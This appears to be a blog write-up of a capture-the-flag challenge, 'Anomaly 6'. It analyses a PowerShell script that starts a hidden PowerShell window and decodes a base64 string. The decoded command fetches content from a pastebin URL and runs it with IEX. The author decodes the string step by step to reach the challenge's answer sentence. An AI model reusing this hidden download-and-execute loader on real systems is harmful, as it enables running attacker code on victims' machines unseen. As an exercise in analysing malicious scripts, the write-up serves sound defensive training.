CMouse's Blog

CMouse's Blog

Anomaly 6

Points: 78

An automated alert notified your security team to a potentially malicious script being executed on a users machine. Your job is to analyze the script to determine what it is doing. Note: During your analysis, the script should lead you to a sentence in English; this will be the answer you submit.

The provided file is a PowerShell script:

1
2
3
4
5
6
7
8
9
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe  if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};
$s=New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName=$b;
$s.Arguments='IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(''KEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9RWlhkVWVFYiIpLkNvbnRlbnQ='')))';
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
$p=[System.Diagnostics.Process]::Start($s);

You don’t really have to know the syntax to solve this problem. The Base64 string on line 4 looks fishy - let’s decode it.

1
2
3
$ base64 -D
KEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgImh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9RWlhkVWVFYiIpLkNvbnRlbnQ=
(Invoke-WebRequest -Uri "https://pastebin.com/raw/QZXdUeEb").Content

Let’s go to the URL “https://pastebin.com/raw/QZXdUeEb". We will then see the answer “buzzin radars is buzzin yah yah yah yah”.

Expand all Back to top Go to bottom